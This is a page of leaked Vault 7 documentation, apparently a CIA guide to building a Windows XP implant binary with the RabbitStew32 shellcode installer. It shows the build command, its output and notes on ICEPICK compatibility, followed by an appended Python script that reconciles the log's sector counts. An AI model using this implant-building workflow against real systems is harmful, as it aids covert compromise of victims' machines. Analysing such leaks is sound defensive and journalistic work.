Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
SECRET//NOFORN
9. (S//NF) Example 2: Configuring SG 2.1 for Shellterm's Shellcode injector module
(S//NF) The following example shows how to configure SG2.1 with an ICEPICK DLL payload and a JediMindTricks driver payload, and how to enable the network component. The resulting binary file will be written to 'winxp32_dsn.bin'. This assumes Vbr.exe has already been run to generate the proper .asm file, and that the .asm file is in the same folder as RabbitStew32.
(S//NF) Figure 17 – The first line is what the user enters. We use '--xp' to denote that the target OS is Windows XP. The output from the command includes some debugging information that you can use for verification (the same details can be found in the receipt file). Note: some sizes are reported in sectors (1 sector = 512 bytes for SG2), while the per-file sizes are in bytes.
C:\...\shellcode_builder>RabbitStew32.exe --xp --pd sg_ip_32_gh1.dll --sp c:\stub.dll
--output winxp32_dsn.bin --network --ps c:\payloads\ap_winxp.sys
Binary: 'winxp32_dsn.bin'..
pArgs [009800F6] offset [d6]
Copying in VBR image
File [Binaries\msvcrt_WinXPx86.sys] size is [49664]
File [c:\payloads\ap_winxp.sys] size is [18560]
File [sg_ip_32_gh1.dll] size is [109568]
File [Binaries\MemStub32.dll] size is [70144]
File [Binaries\network_WinXPx86.sys] size is [23296]
Copying in parameters
Stub Driver size is [97]
Payload Driver size is [37]
Payload DLL size is [215]
Addons size is [46]
Total payload size is [395]
DLL PATH XOR key is: bd ac fa 6d f0 ff 7b ba d6 27 b8 29 56 7d 72 07
--- Write completed..
(S//NF) Yes, it is that simple! Note that in the above example we use a GH1 ICEPICK without the --gh1 switch (that is, a non-GH1 stub). This is OK for ICEPICK, because ICEPICK properly handles the condition where the stub launching it is not GH1 compliant. This is by design in ICEPICK, to reduce the number of binaries that can be created. Not all implants are created equal, so do not assume another implant/payload will handle things accordingly.
(S//NF) There are two main downsides to using the shellcode installer. The first, and most obvious, is that you must use Shellterm to launch it. The second is that the shellcode installer performs very few safety checks: if the files given to --ps and --pd exist, they are read in and used as-is. If you accidentally provide a text file to --ps instead of a valid driver file, the system will explode on use. The Grasshopper installer performs a few more verification checks for the user.
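Because the installer itself checks so little, an analyst reviewing a receipt file or build log from this tool can at least check the sector accounting it reports against the input file sizes. The following Python is an added example, not part of the original document or of the SG toolchain: it parses the size lines quoted in Figure 17, confirms the component sector counts add up to the reported total, and flags any component whose count differs from ceil(file bytes / 512). The mapping of components to input files is an assumption inferred from the numbers; the MemStub32.dll line is read by the tool but matches no reported sector count here, so it is left unmapped.

```python
import re

SECTOR_BYTES = 512  # SG2 sector size, as stated in the Figure 17 caption

# Constructed sample: the size lines from the RabbitStew32 output quoted on this page.
BUILD_OUTPUT = """\
File [Binaries\\msvcrt_WinXPx86.sys] size is [49664]
File [c:\\payloads\\ap_winxp.sys] size is [18560]
File [sg_ip_32_gh1.dll] size is [109568]
File [Binaries\\MemStub32.dll] size is [70144]
File [Binaries\\network_WinXPx86.sys] size is [23296]
Stub Driver size is [97]
Payload Driver size is [37]
Payload DLL size is [215]
Addons size is [46]
Total payload size is [395]
"""
FILE_RE = re.compile(r"^File \[(?P<path>[^\]]+)\] size is \[(?P<n>\d+)\]$")
COMP_RE = re.compile(r"^(?P<name>[A-Za-z ]+?) size is \[(?P<n>\d+)\]$")
# Assumed: which input file feeds each sector-counted component (inferred
# from the sizes; the page does not state the mapping explicitly).
COMPONENT_FILES = {
    "Stub Driver": "Binaries\\msvcrt_WinXPx86.sys",
    "Payload Driver": "c:\\payloads\\ap_winxp.sys",
    "Payload DLL": "sg_ip_32_gh1.dll",
    "Addons": "Binaries\\network_WinXPx86.sys",
}

def parse_build_output(text):
    """Split the output into {input path: bytes} and {component: sectors}."""
    files, comps = {}, {}
    for line in text.splitlines():
        if m := FILE_RE.match(line):
            files[m["path"]] = int(m["n"])
        elif m := COMP_RE.match(line):
            comps[m["name"]] = int(m["n"])
    return files, comps

def reconcile(text):
    """Verify the sector total and list components whose count differs from ceil(bytes/512)."""
    files, comps = parse_build_output(text)
    parts = {k: v for k, v in comps.items() if k != "Total payload"}
    total_ok = sum(parts.values()) == comps.get("Total payload")
    mismatches = {}
    for comp, path in COMPONENT_FILES.items():
        expected = -(-files[path] // SECTOR_BYTES)  # round up to whole sectors
        if comps[comp] != expected:
            mismatches[comp] = (comps[comp], expected)
    return total_ok, mismatches
```

On this page's numbers the component counts sum to the reported total of 395, while the Payload DLL is reported as 215 sectors where 109568 bytes need only 214; the page does not explain the extra sector.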